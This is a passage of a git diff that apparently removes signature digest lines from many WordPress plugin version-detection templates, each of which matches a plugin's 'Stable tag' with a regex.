+46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f5bc96e9c359c479309efb7014d71a9b69e60707cc6d6d1372b36c791b1341ff022100b709bb9b1ee67c73e40b9836c0b030209e6e79ba745590bf5ea441cbeba09fb8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index ff99e31caa..305d74e8ea 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201d864af73ae4484819ac91b89de80cd27ad4c349b865c150113520745c2a42e502201dc1b7d646de8e8cc6c401cfde91729306a500df04526ab2bd6b902ca5efaa6c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 0d720f1543..668162fc4e 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022073b42cae910a0a81068fcfef3e180165f7b4ee64667091e9642ea621bab2943b022056b2948974e4d444816e285925b28dec4612706baf70125f41910e836d39ed3f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index f1fc4a092a..2a233f389d 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022010569dd0e0c1e12e2438f57b8faf23bef68aaa06fd6407dae4c7ef66860a246c02203c2fdff4b079014810d2087fc7d8b73d01feb2c1ca73d7b09c2b9de93ef242bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index c9991272f2..a0d2554492 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022075ad792937aaeadda383086a3c15a05f64ecaa56e97416b09d4ca68d494c41d60221008ee275b82498609185268b84cfce17cd483200f2509e7394ff9eae3ed32ee421:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 8b6692af8e..4e5046273d 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022028ad689d7a3b86bc3178c0a361867700b248c9f087c96970632dbe3ef274bbee02210084a4f9836ae877e7479a14b02a7b4d22a73f220074da989c6e7f9a2b43ba3492:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index b9b721e603..f44cee7980 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ac6759dcb8f4c917fcfa965891961cf0f2e52c43c6fcd537d887c480de87e94802200add0d39056c3c03dbcb2a7d27dd520ee6f698ee2e087ac14bb44cf901fa2bf9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 7858633de5..39130db767 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c9336dc6aeb01467febbf09aa1c3af9598827e068db10079f773dcc59926302902200f0421060d41d8174708439fab63900614ce38eeee06c8f67059c66f2854d8d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index f84ec0da4d..39c497073c 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022040a94fcf85454556d43f54c7f525c8c65a38a8898da729278a7867801d54c11a022077786c02ef15dbc4c24a5f76815aab0ad15b3d51a55162753e86238ebd39f006:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index a94c27395b..b848288b55 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100aa884548a28f8165765dea1920edb2f856e16fcfa9d3cbe9bf49d90179307f5902202dbeb1677eb499f29ff1476fb0338be07a68c17e61d66dc75141caa9b1cade02:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 3110d1aa68..4d10178692 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f8a48b862fe2b7f7aae83317795f2ea8da86010d796754d3a4a4231964ce99b5022100be33c87423f82c58f3abd60ee80d45ed32130095427fe50f6d43ef0cde22e073:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index f3689a53eb..7aac0a153f 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022028ea3ca280c8592263e2b63da7b3cc5725d704daabf6c602db02a9d178543e6e022100bfd8d2bedc8267e396e9a7263455d7b687d7b6f1409780b1e95d5b5551d30704:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index cf3d24bd1e..d0cebd5316 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203ad9bf7f984fc73503aad2082ffe9213e39ce56f3d619f877f9ab3b83c2da87e0220149d7f296032f5ebeadf09c0eedf72d582d7a54b03c9df9278171a1c827f698a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 066ce18907..ff20779157 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210097d1b9c3e43313a59ff2c8bfd3ff0994f26493be69a6be036dcb3a648a33f808022100ad6beae48f5f64fa72bfb2745bfa7606b948b4e69f20d78986b76c634678070f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index b16781c870..fffdc7d017 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204aebb46f56b3e988a3247456b501bccd13439c4b3ea2d4f6365064f12ce22fe1022100e5e147eafeabcfc2fe92036ceaf35e7fa67536d23e45540e6b9e361906889472:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 6b89dcde97..7a9746a70d 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d88c7cf7a3c4563169795782757232f9ac0d888843d25ffc1df66eb093cbbfc6022100c5d50acef038cc937ce1cf3bc40143b1327d0b9c25a63f06c2a363d8276e27bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index e44667b3c3..3fe86debf5 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009c6aabc3adc23eb4dcc1bc16c3a67dba7b753acb11f7d518b369e83a35ce04940220641f5ed6fc1ffcfe7312d328ccb3ffb86588a32c6869dbafdb591d852ba4d649:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-history.yaml b/http/technologies/wordpress/plugins/simple-history.yaml index 371b4aea36..18a7437e94 100644 --- a/http/technologies/wordpress/plugins/simple-history.yaml +++ b/http/technologies/wordpress/plugins/simple-history.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220724275a589e65778e5dd4c82b2107d99251cdfd12fdc5c9ded548bd0ca515a020220098f1fed9459b43db91c450562ebedcb40c098c4799d6c124b2519a4d224ce40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index f25e4bc4e8..3deac58709 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022000f6ad2eac1e770943c5abfc1eef05af0c4a1e0685b7c8d8b1e1a5a7ed14838a0220084da4da8c9fd7b895a198c9292f48bbc89f5fee7174f41dd1266271736477e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index dd8d1eb29f..e7e7c27682 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c233c7a4e4ca5d396de3b44c65b3604859cf6745001c143bf93b6f7ddccdb93b022100a2e0d6a445dcf6651055c00549f5ee5993f0311c400a3de363c6e67de4eb2930:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index 0fdffbb687..ad4ebefa4b 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008b5cdccff967a76e8ae65d775f5a6f051d158a00d4678b6863fdb208b86329f9022100d4424d2d4242cd050b367f53442305cb04c7d4c47ee4e9ea38c4f54dac70c5b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 931f052264..8e88c81c0a 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c08a7106357e3f211e6c241e209c3c8f574f38c59973411764ead2bfc4efea1402210089b8cae4cd1fe40d9a94a70a8ea895ce2303b0445564babd96156d8cc12d1a74:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index 4096e5c394..39d269fb85 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ece6615c9fae38243d7e20aab07bf9d5bcbfb209ebdb10d19c40021ef0c3db2d02204bb9bc2b2d28e8d6e061c807148e0f8de2e7905d24493cc9d9856cf9539d0bee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index f4df9d33dd..fc126d83c6 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220310009c5490ffe55626c3fc439209c3f84633eaa1ad710d8f0530b8b9b53ba70022100f014ac766ec26d52ffc2c98d176ede07df2c3fb8e1a5b4fcb674c71ae035b86a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 6467d329ee..8c49a34259 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a533699e5b39cbd3a97b5cffb70d1dcd755fea39467ded8a9655cd1166737ae7022100ba4feb3cd5e0a586088f278847ce97800f417cfb49a341b2ded06a2031732278:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index e4935f453b..c20ed6552a 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203f3b28c6c29359a37167fb4cd505e7dfa8f9303f4a4bc86d2dfb019ae70bb687022100c8ec56aefde5ab5f13f1e3bea44128b40f045dadf938c2ffd92b560b66470259:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 64667ddef0..6ac2212b4b 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203affe6ac6e11f65790fc2ae4e08fb85daba6a18a49fb5ad9b41864b5316e097c02201d744c5e807338fc76242436b7f9f253e64f4f6e56a495fc2101c910cbb98d5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 1064e8165c..71c71b5ed1 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f4b9d967c2cf997a7f7b8ac6fb34558dd18b8ab754edda24483d24f25b000ba70220478adaa8e18de09394785287b5dd9ca023be9cc88a070f2dd7f1001909d73df5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index ea7e68d1e8..7b47adc274 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022031542ebd84deeae114b1b99a72027d5ab542fa3574749cbbdd8fbbe7b71d3d3c022044384037c3d92f12cafc3fd41408f1456369dd135fd9fb44bfffb62db0c50ed7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index f795c5517e..38391bd9f3 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f3e26c5c2b78297b0dc87798a41501ebf079e4f9b844933b171604df1c98b0cd022038880338669a35abab48b7e3ecdff174dbede614cb89fda81ea304ea85f258be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index bb0ac1dd43..c4928059f6 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100aaa8e6bbf651dc8ab964da0562172b333419f4a0bb81ad89341fa3baf07eb08d0220554c338da25b59479d47fdd6f5b1a7054e3996b87fd1b854a25cc957ba115162:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index 393f58f783..f6a7836f35 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e4994aee944d44a0966f6053facad5270d54b69f4dfb30b64eff506cef292ce1022100e972fb96a5ceb47b5d91e7113e3def91c1b641f9fb5d5b39ff55917d4833cc12:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 8f3ae71586..b7af708c4f 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100aa83d322dca4e74dcdfedd8b1bcb3a8f6cca54ec1fc7e4763eff9b6b6ded8bd6022048835295235ae69a586715475df52a4775eccef1d09f62b696a4ac20fdaa461d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 9ab39d533d..61a793edf7 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e694920d48c29d2044cc529b29e74bdd71ea6726bd42c2c0ecf494c0385d611b022009186832666a2ab17f256abf84991a09c77d3bbb62a6793de3220e53eba01bca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 7254f3b63e..0da88d5d3f 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f7fd755fe10e2100291b34ae55555a59ced1733fdb8825b573af8689815bff5d022100f1f34662915fd88ad1434f127ed8e6a80c246cccb5ff0d1d52fb4f2ac684813c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index fd90161fca..3e1e79e004 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c4e9098c3ba8c5fc5f7d9150fe2dcc3bc4c24d618e61fa315059351951c2fd3b022100fa261e8bd27039855e9f4fdd4287eca7f8c42b890ccda598004addc5facc557f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index d5705714fa..181e619a7c 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220792c2d2a73395a6f2c899d8de47fdc89fb1ac533cd89f6f6f50fecf4757d499002202043cc6994761676baf90ae665eb97e17dcbc05269062f47c5653cf481acdbbf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 30cc2d3803..8164eb4483 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d418773853eb59839bbbfdc10252feab61191b3a20cb3b9eef7c97ff1da73352022100ab64852c3c7f747df06d19f6a95d7d579dc73cb3b460752c19904d4071008c8f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index fcbec0a472..59554defdf 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206f5ef0c97476bd4599bb75d7837e264a962b429525e1e9af0dda711b1fe9d08f022100ca53bdedbba02ed5014e01353ecb795c25fca71178c842988d100c7b4c9f1d50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 8de459e515..350fd9436b 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022052b0b4f8cd19d8cd9881b9416db25698e3115b5bc40f7312bbd608f8071f52d602205b449b43974c2b52e7aa755c62db0160dbb088b3acc842ac98825ec68ae39440:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index dfbaf3df98..2ae6bafbba 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e94ec671f3be7dc66f817ca3b6517a9d2a2913d4edc532974eb039183a584f0e0221009ab6fef14fb3b99fb9ddacdf6bc91269b4a0258dce7d1d16e72450f81776ac49:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index 2ccfe02523..d0dc8d92bb 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ac0e2ce1f8036a422c805e48b7685f89da0b8da19d53d569ab33e1320855aca402206b77f9147656cc4e1b6d5a6245e81cc5f3e94931e4fb602244397d6d0836075b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index 5105d3b59e..c49bbc2b6d 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202fffcabbf31cf86028e3892d63c4e624758aae6f789a118fcb173f74290c6b0802206c9c04dce79b981a0a3cf2e5bf22155b1666e94ef128fa9ac5a6e0a99b8917d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index d7b160e1d2..27586cbd9d 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100eda87c68428c4730928e3b3f67617f246da5387e017057bae61d7b1a359b1f27022040561671e865d1e18ddccdd1bdb7bdf90c9ef6961d6431dcdcf8dfbd631ea7ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index a70e0d2c32..946272f0a9 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204078623b07e84e2d7737464f4074d1b3350bf8c9f26e98a72fa4ef7418ca60bd02210082dac51e4e0b757a12e24205fd93cbfc2648bd5e97be520676af22743fcdbccb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index 8c9d46d0c5..aa29706872 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e03559eb364da112eb07fbf08609d707fc45cc26264af0e10ded79b309927964022100ed54b2f29d10aa359012ef6138dc275827fd1e1b986c8c49a366762ca413091a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 6464a44844..290d53ab7e 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202a9aa51c5d8f72d0112ecc858a63e35c650096f6e11061152b251163a79b2efe0220692ccdb42c6c4a03b3935822b6859f2d4d331354c04924dcf3adbbc63fe165b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff 